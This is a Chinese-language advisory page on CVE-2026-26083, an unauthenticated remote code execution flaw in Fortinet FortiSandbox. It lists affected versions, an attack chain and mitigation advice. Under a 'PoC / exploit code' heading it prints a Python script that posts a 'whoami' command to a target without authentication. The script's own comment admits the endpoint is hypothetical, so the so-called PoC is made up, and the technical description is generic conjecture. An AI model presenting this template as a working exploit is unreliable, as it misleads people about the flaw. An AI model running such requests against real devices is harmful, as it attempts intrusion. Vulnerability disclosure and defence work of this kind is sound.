CVE-2026-26083 CVSS 9.8 严重

CVE-2026-26083 Fortinet FortiSandbox 未授权代码执行漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-26083

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiSandbox

漏洞概述

Fortinet FortiSandbox 存在严重的授权缺失漏洞。由于系统未正确验证权限，未经身份验证的远程攻击者可通过发送恶意 HTTP 请求，在受影响的设备上执行未经授权的代码或命令。该漏洞影响本地版、云版及 PaaS 版的多个版本，可能导致攻击者完全控制受影响系统，造成严重的数据泄露或服务中断。

技术细节

该漏洞的核心成因在于 Fortinet FortiSandbox 系统的特定 Web 接口或管理端点未实施严格的访问控制策略，即 Missing Authorization 漏洞。由于系统在处理特定 HTTP 请求时未对用户身份进行有效验证，导致任何能够访问网络端点的攻击者均可利用此缺陷。攻击过程通常不需要复杂的交互，攻击者只需向受影响设备的特定 URL 路径发送精心构造的 HTTP POST 或 GET 请求。请求中可能包含特定的参数或载荷，旨在触发后端的命令执行接口。一旦请求被服务器处理，由于缺乏权限拦截，攻击者注入的恶意代码或系统命令将在服务器权限下运行。鉴于其无需认证（PR:N）且攻击复杂度低（AC:L）的特性，该漏洞极易被自动化工具利用，导致系统被完全接管。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别暴露的 Fortinet FortiSandbox 设备及其管理接口端口（通常为 80/443）。

STEP 2

2. 漏洞利用

攻击者向存在授权缺失缺陷的特定 API 端点发送特制的恶意 HTTP 请求，无需进行身份验证。

STEP 3

3. 代码执行

服务器处理该恶意请求，由于未校验权限，直接在系统上下文中执行攻击者注入的代码或系统命令。

STEP 4

4. 权限维持与扩展

攻击者利用获得的执行权限建立后门，窃取敏感数据或横向移动到内网其他设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# Target configuration
target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1"
url = f"{target}/api/vulnerable_endpoint" # Hypothetical endpoint based on description

# Malicious payload to execute a command (e.g., 'whoami')
payload = {
    "cmd": "whoami",
    "arg": "-u"
}

headers = {
    "User-Agent": "CVE-2026-26083-Exploit",
    "Content-Type": "application/json"
}

try:
    # Send unauthenticated HTTP request
    print(f"[*] Sending exploit request to {target}...")
    response = requests.post(url, json=payload, headers=headers, verify=False, timeout=10)
    
    if response.status_code == 200:
        print("[+] Exploit successful! Command output:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[!] Error: {e}")

影响范围

FortiSandbox 5.0.0 - 5.0.1

FortiSandbox 4.4.0 - 4.4.8

FortiSandbox Cloud 5.0.2 - 5.0.5

FortiSandbox PaaS 23.4 (全版本)

FortiSandbox PaaS 23.3 (全版本)

FortiSandbox PaaS 23.1 (全版本)

FortiSandbox PaaS 22.2 (全版本)

FortiSandbox PaaS 22.1 (全版本)

FortiSandbox PaaS 21.4 (全版本)

FortiSandbox PaaS 21.3 (全版本)

FortiSandbox PaaS 5.0.0 - 5.0.1

FortiSandbox PaaS 4.4.5 - 4.4.8

防御指南

临时缓解措施

在无法立即应用补丁的情况下，建议将 FortiSandbox 管理界面置于内部网络中，并严格限制入站访问规则。同时，应密切监控系统的异常流量和进程活动，一旦发现被攻击迹象，应立即隔离受感染设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-26083
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-26083
3 Details https://www.cvedetails.com/cve/CVE-2026-26083/
4 VulDB https://vuldb.com/cve/CVE-2026-26083
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-26-136

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表